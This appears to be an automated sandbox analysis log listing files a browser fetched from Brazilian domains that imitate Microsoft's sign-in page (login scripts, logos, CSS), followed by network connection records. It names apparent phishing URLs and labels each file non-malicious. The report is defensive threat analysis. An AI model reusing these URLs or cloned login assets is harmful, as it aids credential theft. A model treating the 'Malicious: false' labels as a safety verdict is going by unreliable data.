                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):28
                                                        Entropy (8bit):4.307354922057605
                                                        Encrypted:false
                                                        SSDEEP:3:8Kiun9ks:8Kiun2s
                                                        MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                        SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                        SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                        SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCQI6CrYL46keEgUN0VtRUhIFDVd69_0hIzLD4HM9aOc=?alt=proto
                                                        Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 352 x 3
                                                        Category:downloaded
                                                        Size (bytes):2672
                                                        Entropy (8bit):6.640973516071413
                                                        Encrypted:false
                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif
                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):22
                                                        Entropy (8bit):3.6978458230844122
                                                        Encrypted:false
                                                        SSDEEP:3:jAbukMn:jP
                                                        MD5:6AAB5444A217195068E4B25509BC0C50
                                                        SHA1:7B22EAF7EAA9B7E1F664A0632D3894D406FE7933
                                                        SHA-256:FC5525D427BFA27792D3A87411BE241C047D07F07C18E2FC36BF00B1C2E33D07
                                                        SHA-512:AA5F66638B142B5E6D1D008F2934530C7AAD2F7F19128CA24609825D0DACFFD25A77591BFD7FB1D225BE2FA77CABCE837E0741326C1AC622C244D51E6FAFB303
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://h89s9dhj.ccbequipamentos.com.br/favicon.ico
                                                        Preview:<h1>Access Denied</h1>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                        Category:downloaded
                                                        Size (bytes):621
                                                        Entropy (8bit):7.673946009263606
                                                        Encrypted:false
                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                        Category:dropped
                                                        Size (bytes):17174
                                                        Entropy (8bit):2.9129715116732746
                                                        Encrypted:false
                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):72
                                                        Entropy (8bit):4.241202481433726
                                                        Encrypted:false
                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):689017
                                                        Entropy (8bit):4.210697599646938
                                                        Encrypted:false
                                                        SSDEEP:6144:rnQWWDY3mr16XRxcpuEhjMPRKkC0d7xyF0FA9OgoUE0HUN4oe+:rBWU3xhDKkTshoj5
                                                        MD5:3E89AE909C6A8D8C56396830471F3373
                                                        SHA1:2632F95A5BE7E4C589402BF76E800A8151CD036B
                                                        SHA-256:6665CA6A09F770C6679556EB86CF4234C8BDB0271049620E03199B34B4A16099
                                                        SHA-512:E7DBE4E95D58F48A0C8E3ED1F489DCF8FBF39C3DB27889813B43EE95454DECA2816AC1E195E61A844CC9351E04F97AFA271B37CAB3FC522809CE2BE85CC1B8F0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_yYLwtowrqBEhphSPA6BiJQ2.js
                                                        Preview:.!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 9 x 40, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):4.035372245524404
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlOtxijikxl/k4E08up:6v/lhPxik7Tp
                                                        MD5:E27CBA59C9BFFD33F6CD6ACB21D4D5C0
                                                        SHA1:A15E5BC2CEA9929480BD645687ACA09732B16966
                                                        SHA-256:12A0C47CCD7CA1385035882D68EA88DFB55A0E71E053D92FEC9182408453D72D
                                                        SHA-512:44A51854666BE1D00491F78951E1C772CBD370AA912C577AC831B0498688943A8BEC32ED18DF78C99791535DCC572FDEA4A70AFDF40DD6E965B0CD9B1E80F00A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.......(.......G.....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 352 x 3
                                                        Category:dropped
                                                        Size (bytes):2672
                                                        Entropy (8bit):6.640973516071413
                                                        Encrypted:false
                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:downloaded
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 352 x 3
                                                        Category:downloaded
                                                        Size (bytes):3620
                                                        Entropy (8bit):6.867828878374734
                                                        Encrypted:false
                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif
                                                        Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                        Category:downloaded
                                                        Size (bytes):20410
                                                        Entropy (8bit):7.980582012022051
                                                        Encrypted:false
                                                        SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                        MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                        SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                        SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                        SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                        Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:dropped
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        No static file info
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 17, 2025 17:42:21.802259922 CET49671443192.168.2.4204.79.197.203
                                                        Mar 17, 2025 17:42:22.114643097 CET49671443192.168.2.4204.79.197.203
                                                        Mar 17, 2025 17:42:22.724035025 CET49671443192.168.2.4204.79.197.203
                                                        Mar 17, 2025 17:42:23.926789045 CET49671443192.168.2.4204.79.197.203
                                                        Mar 17, 2025 17:42:24.138683081 CET49725443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:42:24.138715029 CET44349725142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:42:24.138855934 CET49725443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:42:24.139062881 CET49725443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:42:24.139079094 CET44349725142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:42:24.862799883 CET44349725142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:42:24.863014936 CET49725443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:42:24.864521027 CET49725443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:42:24.864528894 CET44349725142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:42:24.864738941 CET44349725142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:42:24.911190987 CET49725443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:42:25.824799061 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:25.824840069 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:25.824939013 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:25.829025030 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:25.829051971 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:25.829116106 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:25.830107927 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:25.830120087 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:25.830316067 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:25.830341101 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.331892014 CET49671443192.168.2.4204.79.197.203
                                                        Mar 17, 2025 17:42:26.368098021 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.368184090 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.369559050 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.369569063 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.369772911 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.370438099 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.371002913 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.371064901 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.372114897 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.372137070 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.372354031 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.412326097 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.413794041 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.897326946 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.899709940 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.899787903 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.901878119 CET49729443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.901901007 CET4434972923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:26.904535055 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:26.948328018 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:27.053980112 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:27.054003000 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:27.054065943 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:27.054166079 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:27.054194927 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:27.054971933 CET49728443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:42:27.054997921 CET4434972823.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:42:27.087816000 CET49731443192.168.2.4104.18.94.41
                                                        Mar 17, 2025 17:42:27.087852001 CET44349731104.18.94.41192.168.2.4
                                                        Mar 17, 2025 17:42:27.087945938 CET49731443192.168.2.4104.18.94.41
                                                        Mar 17, 2025 17:42:27.088068008 CET49731443192.168.2.4104.18.94.41
                                                        Mar 17, 2025 17:42:27.088078976 CET44349731104.18.94.41192.168.2.4
                                                        Mar 17, 2025 17:42:27.757479906 CET44349731104.18.94.41192.168.2.4
                                                        Mar 17, 2025 17:42:27.757714033 CET49731443192.168.2.4104.18.94.41
                                                        Mar 17, 2025 17:42:27.758796930 CET49731443192.168.2.4104.18.94.41
                                                        Mar 17, 2025 17:42:27.758810043 CET44349731104.18.94.41192.168.2.4
                                                        Mar 17, 2025 17:42:27.759022951 CET44349731104.18.94.41192.168.2.4
                                                        Mar 17, 2025 17:42:27.759357929 CET49731443192.168.2.4104.18.94.41
